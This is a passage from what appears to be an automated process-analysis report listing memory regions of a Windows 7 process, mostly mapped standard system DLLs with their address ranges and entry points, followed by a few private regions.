"c:\\windows\\system32\\srvsvc.dll") Region: id = 1568 start_va = 0x7fef5560000 end_va = 0x7fef55a6fff monitored = 0 entry_point = 0x7fef5561040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1569 start_va = 0x7fef55b0000 end_va = 0x7fef55f1fff monitored = 0 entry_point = 0x7fef55b17e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1570 start_va = 0x7fef5600000 end_va = 0x7fef5610fff monitored = 0 entry_point = 0x7fef56014c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1571 start_va = 0x7fef5620000 end_va = 0x7fef56b1fff monitored = 0 entry_point = 0x7fef56951ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1572 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1573 start_va = 0x7fef5740000 end_va = 0x7fef5779fff monitored = 0 entry_point = 0x7fef575d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1574 start_va = 0x7fef5960000 end_va = 0x7fef5970fff monitored = 0 entry_point = 0x7fef5969e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1575 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1576 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1577 start_va = 0x7fef5b90000 end_va = 0x7fef5ba6fff monitored = 0 entry_point = 0x7fef5b91060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1578 start_va = 0x7fef5bb0000 end_va = 0x7fef5d5ffff monitored = 0 entry_point = 0x7fef5bb1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1579 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1580 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1581 start_va = 0x7fef8080000 end_va = 0x7fef8088fff monitored = 0 entry_point = 0x7fef80811a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1582 start_va = 0x7fef8450000 end_va = 0x7fef8466fff monitored = 0 entry_point = 0x7fef8459d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1583 start_va = 0x7fef8d20000 end_va = 0x7fef8d96fff monitored = 0 entry_point = 0x7fef8d2afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1584 start_va = 0x7fef8df0000 end_va = 0x7fef8eddfff monitored = 0 entry_point = 0x7fef8df12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1585 start_va = 0x7fef8ee0000 end_va = 0x7fef8ee9fff monitored = 0 entry_point = 0x7fef8ee260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1586 start_va = 0x7fef8ef0000 end_va = 0x7fef9001fff monitored = 0 entry_point = 0x7fef8f0f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1587 start_va = 0x7fef9010000 end_va = 0x7fef901efff monitored = 0 entry_point = 0x7fef9017e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 1588 start_va = 0x7fef9020000 end_va = 0x7fef9028fff monitored = 0 entry_point = 0x7fef9023668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1589 start_va = 0x7fef9030000 end_va = 0x7fef9038fff monitored = 0 entry_point = 0x7fef9031020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1590 start_va = 0x7fef9040000 end_va = 0x7fef9095fff monitored = 0 entry_point = 0x7fef9041040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1591 start_va = 0x7fef90a0000 end_va = 0x7fef90fdfff monitored = 0 entry_point = 0x7fef90a9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1592 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1593 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1594 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1595 start_va = 0x7fef91c0000 end_va = 0x7fef91c9fff monitored = 0 entry_point = 0x7fef91c3994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1596 start_va = 0x7fef98b0000 end_va = 0x7fef98f1fff monitored = 0 entry_point = 0x7fef98e0048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1597 start_va = 0x7fef9900000 end_va = 0x7fef9919fff monitored = 0 entry_point = 0x7fef9911ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 1598 start_va = 0x7fef9940000 end_va = 0x7fef994efff monitored = 0 entry_point = 0x7fef9946894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 1599 start_va = 0x7fefb210000 end_va = 0x7fefb223fff monitored = 0 entry_point = 0x7fefb213e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1600 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1601 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1602 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1603 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1604 start_va = 0x7fefb300000 end_va = 0x7fefb30bfff monitored = 0 entry_point = 0x7fefb3015d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1605 start_va = 0x7fefb310000 end_va = 0x7fefb31ffff monitored = 0 entry_point = 0x7fefb31835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1606 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1607 start_va = 0x7fefb340000 end_va = 0x7fefb376fff monitored = 0 entry_point = 0x7fefb348424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1608 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1609 start_va = 0x7fefb3e0000 end_va = 0x7fefb4a1fff monitored = 0 entry_point = 0x7fefb3e101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1610 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1611 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1612 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1613 start_va = 0x7fefb970000 end_va = 0x7fefb985fff monitored = 0 entry_point = 0x7fefb9711a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1614 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1615 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1616 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1617 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1618 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1619 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1620 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1621 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1622 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1623 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1624 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1625 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1626 start_va = 0x7fefcb10000 end_va = 0x7fefcb21fff monitored = 0 entry_point = 0x7fefcb11060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1627 start_va = 0x7fefcb30000 end_va = 0x7fefcb4efff monitored = 0 entry_point = 0x7fefcb35c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1628 start_va = 0x7fefcc00000 end_va = 0x7fefcc38fff monitored = 0 entry_point = 0x7fefcc0c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1629 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1630 start_va = 0x7fefcc50000 end_va = 0x7fefcc5cfff monitored = 0 entry_point = 0x7fefcc51348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1631 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1632 start_va = 0x7fefce30000 end_va = 0x7fefce5ffff monitored = 0 entry_point = 0x7fefce3194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1633 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1634 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1635 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1636 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1637 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1638 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1639 start_va = 0x7fefd210000 end_va = 0x7fefd23efff monitored = 0 entry_point = 0x7fefd211064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1640 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1641 start_va = 0x7fefd2c0000 end_va = 0x7fefd2d3fff monitored = 0 entry_point = 0x7fefd2c4160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1642 start_va = 0x7fefd520000 end_va = 0x7fefd527fff monitored = 0 entry_point = 0x7fefd522a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1643 start_va = 0x7fefd530000 end_va = 0x7fefd539fff monitored = 0 entry_point = 0x7fefd533b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1644 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1645 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1646 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1647 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1648 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1649 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1650 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1651 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1652 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1653 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1654 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1655 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1656 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1657 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1658 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1659 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1660 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1661 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1662 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1663 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1664 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1665 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1666 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1667 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1668 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1669 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1670 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1671 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1672 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1673 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1674 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1675 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1676 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1677 start_va = 0x7fffff46000 end_va = 0x7fffff47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff46000" filename = "" Region: id = 1678 start_va = 0x7fffff48000 end_va = 0x7fffff49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff48000" filename = "" Region: id = 1679 start_va = 0x7fffff4a000 end_va = 0x7fffff4bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4a000" filename = "" Region: id = 1680 start_va = 0x7fffff4c000 end_va = 0x7fffff4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4c000" filename = "" Region: id = 1681 start_va = 0x7fffff52000 end_va = 0x7fffff53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 1682 start_va = 0x7fffff54000 end_va = 0x7fffff55fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 1683 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 